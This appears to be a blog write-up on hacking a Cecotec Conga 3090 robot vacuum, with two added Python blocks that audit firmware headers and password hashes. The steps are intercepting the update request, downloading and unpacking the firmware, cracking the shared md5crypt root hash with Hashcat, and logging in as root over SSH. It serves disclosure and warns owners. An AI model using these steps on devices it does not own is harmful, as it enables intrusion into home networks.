IoT devices are filling our houses these days: so many Christmas gifts that can help with our daily tasks, like remotely watching your baby or your pets, turning on the air conditioning or keeping the floor clean. But are we safe using these devices on our home network? Can someone hack my vacuum?
Let's take a look at a very common device: the Cecotec Conga 3090. It has had many sales (and many returns) and has now been replaced by the new model, the 3490.
Today’s victim: Conga 3090
This model was the Cecotec flagship until the 4090 was released, and with a price of 350-400€ it had a great impact on the robot vacuum market.
Reconnaissance
Let's first check what it exposes on our LAN:
It exposes a DNS service (dnsmasq) and an SSH port (Dropbear), so we need more information before we can get in there.
We now switch to Burp Suite to set up an HTTP(S) proxy, route all the phone's traffic through it and see what the app can tell us. (You can follow a tutorial for this here.)
Aaaaand surprise: we get a GET request checking whether an update is available for our product and asking for the package ramdisk_sys. That's a good entry point, so let's forward this request to Repeater and check the parameters:
GET /device_update?product=CECOTECCRL20A-Release&version=S1.2.38&sn=&pkg_name=ramdisk_sys HTTP/1.1
Host: eu.ota.3irobotics.net:5000
Accept: */*
User-Agent: SCCRobot/2.2.0 (es.cecotec.s3090v1; build:1; iOS 13.3.0) Alamofire/4.7.3
Accept-Language: es-ES;q=1.0
Accept-Encoding: gzip, deflate
Connection: close
This request gives us an HTTP 200 OK but an empty JSON {}, so maybe that's because we already have the latest version installed? Let's try lowering the version to 1.2.34.
Voilà, we now have the URI of the ramdisk package. Let's download it and inspect it:
christian@kali:~/cecotec$ wget http://eu.ota.3irobotics.net:5000/static/ota_packages/CECOTECCRL20A-Release/S1.2.38/ramdisk_sys.tar.gz
Resolviendo eu.ota.3irobotics.net (eu.ota.3irobotics.net)… 47.91.94.73, 47.254.145.60, 47.91.87.185
Conectando con eu.ota.3irobotics.net (eu.ota.3irobotics.net)[47.91.94.73]:5000… conectado.
Petición HTTP enviada, esperando respuesta… 200 OK
Longitud: 23422553 (22M) [application/x-tar]
Grabando a: “ramdisk_sys.tar.gz”
ramdisk_sys.tar.gz 100%[=============================================================>] 22,34M 1,03MB/s en 21s
2020-01-05 13:43:06 (1,06 MB/s) - “ramdisk_sys.tar.gz” guardado [23422553/23422553]
christian@kali:~/cecotec$ tar -xzvf ramdisk_sys.tar.gz
ramdisk_sys/
ramdisk_sys/boot_initramfs.img.md5
ramdisk_sys/boot_initramfs.img
christian@kali:~/cecotec$ cd ramdisk_sys/
christian@kali:~/cecotec/ramdisk_sys$ ls -lah
total 33M
drwxr-xr-x 2 christian christian 4,0K sep 17 12:33 .
drwxr-xr-x 3 christian christian 4,0K ene 5 13:43 ..
-rw-r--r-- 1 christian christian 32M sep 17 12:33 boot_initramfs.img
-rw-r--r-- 1 christian christian 33 sep 17 12:33 boot_initramfs.img.md5
Nice! It looks like we have a 32 MB initramfs image, so it's time to let binwalk do its job:
christian@kali:~/cecotec/ramdisk_sys$ binwalk boot_initramfs.img
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
82432 0x14200 uImage header, header size: 64 bytes, header CRC: 0x9D836DC1, created: 2018-09-30 01:28:12, image size: 23381900 bytes, Data Address: 0x40008000, Entry Point: 0x40008000, data CRC: 0x8CA6E59A, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "ARM OpenWrt Linux-3.4.39"
82496 0x14240 Linux kernel ARM boot executable zImage (little-endian)
98643 0x18153 gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00 (null date)
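To see what binwalk is actually reporting at offset 0x14200, here is an added example (not code from the original post) that parses a U-Boot legacy uImage header, verifies its header CRC and data CRC, and flags a tampered payload. The sample image is constructed in code; only the load/entry addresses and image name are taken from the binwalk output above.

```python
"""Parse and verify a U-Boot legacy (uImage) header such as the one binwalk
found inside boot_initramfs.img. Added example; the sample blob is constructed."""
import struct
import zlib

IH_MAGIC = 0x27051956                       # U-Boot legacy image magic
HEADER_FMT = ">7I4B32s"                     # magic,hcrc,time,size,load,ep,dcrc,os,arch,type,comp,name
HEADER_SIZE = struct.calcsize(HEADER_FMT)   # 64 bytes, as binwalk reports
IH_OS = {5: "Linux"}
IH_ARCH = {2: "ARM"}
IH_TYPE = {2: "OS Kernel Image"}
IH_COMP = {0: "none", 1: "gzip", 2: "bzip2", 3: "lzma"}

def parse_uimage_header(blob: bytes, offset: int = 0) -> dict:
    """Return the header fields at `offset`; raise ValueError on bad magic or header CRC."""
    hdr = blob[offset:offset + HEADER_SIZE]
    if len(hdr) != HEADER_SIZE:
        raise ValueError("truncated header")
    (magic, hcrc, _time, size, load, ep, dcrc,
     os_, arch, typ, comp, name) = struct.unpack(HEADER_FMT, hdr)
    if magic != IH_MAGIC:
        raise ValueError(f"bad magic 0x{magic:08x}")
    # the header CRC is computed over the header with the hcrc field zeroed
    zeroed = hdr[:4] + b"\x00\x00\x00\x00" + hdr[8:]
    calc = zlib.crc32(zeroed) & 0xFFFFFFFF
    if calc != hcrc:
        raise ValueError(f"header CRC mismatch: 0x{calc:08x} != 0x{hcrc:08x}")
    # the data CRC covers `size` bytes following the header; a mismatch means tampering/corruption
    data = blob[offset + HEADER_SIZE:offset + HEADER_SIZE + size]
    data_ok = len(data) == size and (zlib.crc32(data) & 0xFFFFFFFF) == dcrc
    return {
        "size": size, "load": load, "entry": ep,
        "os": IH_OS.get(os_, os_), "arch": IH_ARCH.get(arch, arch),
        "type": IH_TYPE.get(typ, typ), "comp": IH_COMP.get(comp, comp),
        "name": name.rstrip(b"\x00").decode(), "data_crc_ok": data_ok,
    }

def build_uimage(payload: bytes, name: str, load: int, ep: int) -> bytes:
    """Construct a well-formed Linux/ARM kernel uImage (used only to make a sample)."""
    dcrc = zlib.crc32(payload) & 0xFFFFFFFF
    fields = [IH_MAGIC, 0, 0, len(payload), load, ep, dcrc, 5, 2, 2, 0, name.encode()]
    hdr = struct.pack(HEADER_FMT, *fields)
    fields[1] = zlib.crc32(hdr) & 0xFFFFFFFF  # fill in the header CRC
    return struct.pack(HEADER_FMT, *fields) + payload

# constructed sample: zero padding up to 0x14200, then a fake kernel image
SAMPLE = b"\x00" * 0x14200 + build_uimage(b"fake-zImage-bytes" * 64,
                                          "ARM OpenWrt Linux-3.4.39",
                                          0x40008000, 0x40008000)
```

Note that both CRCs only detect corruption: an attacker who can replace the package can recompute them, so they are no substitute for a signed update.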
Gaining access
We discovered that OpenWrt is the OS running inside the vacuum, so we will try to decompress the image and look for interesting data inside, starting by re-launching binwalk with --matryoshka and rubbing our hands together while watching the entire file system decompress.
If you take even a quick look, you will surely have seen a very interesting file: ./
And... well... it's an MD5 hash (md5crypt), and if we have a good video card in our system we can switch to Hashcat, using -m 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)) and our favorite dictionary (like the CrackStation one) or an online service like OnlineHashCrack.
Now that we have that sweet password, let's try to SSH in:
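The reason this hash cracks so easily is the legacy $1$ (md5crypt) scheme, and the reason it matters is that the same hash ships in every build. Here is an added example (not code from the original post) of the audit a firmware reviewer or vendor would run over extracted rootfs images: it classifies each shadow entry's scheme, flags weak or empty ones, and reports hashes reused across builds. The shadow lines and build names are constructed.

```python
"""Audit /etc/shadow entries extracted from firmware builds: flag legacy schemes
(md5crypt $1$, descrypt), empty passwords, and hashes reused across builds.
Added example; the sample shadow lines below are constructed, not real hashes."""
import re
from collections import defaultdict

# crypt(3) prefix -> (scheme name, considered weak?)
SCHEMES = {
    "$1$": ("md5crypt", True),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False),
}

def classify_hash(field: str) -> tuple:
    """Return (scheme, weak) for the password field of one shadow line."""
    if field == "":
        return ("empty (no password)", True)
    if field.startswith("!") or field == "*":
        return ("locked", False)
    for prefix, info in SCHEMES.items():
        if field.startswith(prefix):
            return info
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):   # traditional DES crypt
        return ("descrypt", True)
    return ("unknown", True)

def audit_shadow(builds: dict) -> list:
    """`builds` maps a build name to the text of its /etc/shadow; returns findings."""
    findings = []
    seen = defaultdict(set)   # hash -> {(build, user)} for every active (unlocked) account
    for build, text in builds.items():
        for line in text.splitlines():
            if not line.strip() or line.startswith("#"):
                continue
            user, pw = line.split(":", 2)[:2]
            scheme, weak = classify_hash(pw)
            if weak:
                findings.append(f"{build}:{user}: weak scheme {scheme}")
            if scheme != "locked":
                seen[pw].add((build, user))
    for pw, where in seen.items():
        builds_hit = sorted({b for b, _ in where})
        if len(builds_hit) > 1:     # same credential in several releases = shared default password
            findings.append(f"hash reused across builds: {', '.join(builds_hit)}")
    return findings

# constructed sample: the same md5crypt root hash shipped in two firmware builds
SAMPLE_BUILDS = {
    "S1.2.34": "root:$1$saltsalt$constructedfakehashAAAAAAAAAA:17800:0:99999:7:::\n"
               "daemon:*:0:0:99999:7:::\n",
    "S1.2.38": "root:$1$saltsalt$constructedfakehashAAAAAAAAAA:17800:0:99999:7:::\n",
}
```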
christian@kali:~$ ssh [email protected]
[email protected]'s password:
BusyBox v1.24.1 () built-in shell (ash)
_____ _ __ _
|_ _||_| ___ _ _ | | |_| ___ _ _ _ _
| | _ | || | | |__ | || || | ||_'_|
| | | || | || _ | |_____||_||_|_||___||_,_|
|_| |_||_|_||_|_| Tina is Based on OpenWrt!
----------------------------------------------
Tina Linux (Neptune, 57513AA3)
----------------------------------------------
root@TinaLinux:~#
We're in! Now I really urge you to change your vacuum's root password every time it gets an update, because that password is the same on all Cecotec Conga 3090 units: anyone who gets access to your Wi-Fi can hack your vacuum and install a persistence module there!